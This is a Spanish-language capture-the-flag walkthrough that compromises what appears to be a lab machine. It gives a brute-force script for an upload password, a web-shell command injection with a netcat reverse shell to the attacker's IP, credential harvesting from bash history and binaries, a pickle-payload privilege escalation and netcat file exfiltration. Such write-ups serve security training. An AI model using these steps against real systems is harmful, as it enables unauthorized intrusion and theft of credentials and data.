Hagamos un nmap como en todos los servidores
nmap -sV -sC 192.168.1.9
Ahora observaremos que tenemos un /dev/ así podemos evitar usar nikto y continuar con el proceso. Al observar la ubicación /dev/ nos muestra para subir una shell pero nos pide una contraseña.
Nos muestra en la opción de olvidar contraseña una QR
zbarimg -d http://192.168.1.9/dev/lostpassword.png
echo "bG9vayBkZWVwZXI=" |base64 -d
La respuesta es: look deeper
Entonces nos da una idea que no es la entrada, lo único que se me ocurrió fue crear un diccionario y hacer fuerza bruta.
crunch 1 5 012345 >cread.txt
Vamos a crear en python una herramienta para hacer fuerza bruta haciendo como path/dev/upload.php y con nuestra ubicación de nuestro diccionario.
import requests fd = open("/root/Desktop/cread.txt") i = 0 while True: line = fd.readline() if line == '': break word = line.strip() if i == 1000: print "Testing", word i = 0 i = i + 1 r = requests.post("http://192.168.1.39/dev/upload.php", data={'password':word}, files={'upload_file':('test','a')}) if "you have supplied an invalid password" in r.content: continue else: print "Cas particulier avec", word print r.content break fd.close()
Ejecutaremos nuestro código
python cread.py
Ahora nos muestra la contraseña
La contraseña seria: 45100
Ahora intentemos subir una shell o un exploit.
Puedes armarte el siguiente código para subir.
Lo podemos guardar con la extensión .yo o .pht o simplemente lo podemos subir con burpsuite y editando la extensión.
Ahora intentaremos conectarlo a nuestra maquina con el siguiente comando que te vas a manejar desde la URL
http://192.168.1.9/dev/upload/porn.yo?cmd=id
Para hacer el reversing
http://192.168.1.9/dev/upload/porn.yo?cmd=/bin/nc -e /bin/sh 192.168.1.7 2121 &Recuerda la IP colocada es la IP de tu maquina es como un LHOST.
Al iniciar hago lo siguiente
id
pwd
ls -l /home
cd /home/amanpour
cat .bash_historyLo que hicimos es ver el historial de los últimos comando que se usaron y obtenemos un código.
python steqr.py -f newpassword
Allí obtenemos la contraseña ssh del server
b56d9d8b6077fb56127d1c8ff84ece11Intenta ingresar SSH con el usuario que investigamos.
ssh [email protected]Ahora buscamos algunos archivos con el siguiente comando, ahora que tenemos nuestro SSH shell ver si podemos lograr una escalada de privilegios. Estimado Amanpour es parte de un grupo llamado "notas".
id
grep notes /etc/group
find / -perm -4000 -type f 2>/dev/null
file /opt/notes
cd /opt/
Vamos a seguir escalar nuestro privilegio.
touch /tmp/trap
nano /tmp/trap
cos system (S'/bin/sh' tR.
./notes
load ../../tmp/trap
cd /home/curtiz
cat notesAhora leemos todos los contenido que tengamos y nos aparece a un tal Marie entonces buscaremos /etc/passwd
grep Marie /etc/passwdPero no tenemos mucha información y vamos a ver el siguiente usuario
file /bin/delacroixPero podemos usar string y vamos a obtener más información.
strings /bin/delacroixAhora vamos a decodificar el hash
EL HASH : 3d054afb77714ca938d8bca104fcb141 LA CLAVE : VonBraun Pero tenemos una clave privado y lo vamos a copiar y pegar con el siguiente paso darle permiso para poder acceder.
cat id_rsa
Y ahora vamos a acceder con delacroix
chmod 700 id_rsa
ssh -i id_rsa [email protected]Ahora vemos algunos contenido que pose y lo que me costo es que el tiempo del archivo lo vamos a lanzar en MD5
stat .last
echo 00:19:51 | md5sum
6cf49e97c915079e27c09d41da9d95e4
sudo -lCopiamos y pegamos el HASH
sudo bash
cd /root/
Ahora descargamos la imagen
nc -lvp 666 > flag
nc 192.168.1.7 666 < flagJoder si que ha sido un desafió muy largo. Para terminarlo en días. No te olvides en compartirlo. GRACIAS!
0 Comments